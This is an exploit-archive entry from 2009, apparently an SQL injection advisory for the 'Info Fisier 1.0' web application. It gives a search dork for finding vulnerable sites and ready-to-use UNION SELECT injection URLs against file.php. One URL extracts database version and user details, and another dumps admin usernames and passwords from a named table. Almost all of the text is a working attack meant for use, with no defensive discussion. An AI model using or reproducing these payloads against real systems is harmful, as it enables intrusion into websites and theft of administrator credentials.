Info Fisier 1.0 - SQL Injection

EKU-ID: 18226	CVE:	OSVDB-ID:
Author: AnGrY BoY	Published: 2009-12-27	Verified:
Download:

Rating

☆☆☆☆☆

====================================================================================
[+]  Info Fisier 1.0  SQL Injection Vulnerability

[+]  Software : Info Fisier 1.0
[+]  Author   : AnGrY BoY
[+]  Contact  : h4kurd@hotmail.com & h4kurd@yahoo.com
[+]  Home     : http://www.kurd-security.com    http://www.h4kurd.com
=====================================================================================


[+] Dork     : Powered by Info Fisier


[+] expolit:

[+] http://server/upload/file.php?id=[sql]

[+] http://server/upload/file.php?id=-54/**/union/**/select/**/1,concat(version(),0x3e,user(),0x3e,database()),3,4,5,6,7,8,9,10,11--

[+] http://server/file.php?id=-670/**/union/**/select/**/1,group_concat(admin,0x3e,pass),3,4,5,6,7,8,9,10,11/**/from+djsefu_useri--


======================================================================================
[+]Special Thanks:- Hangaw_hawlery & FormatXformaT   and all kurd-security members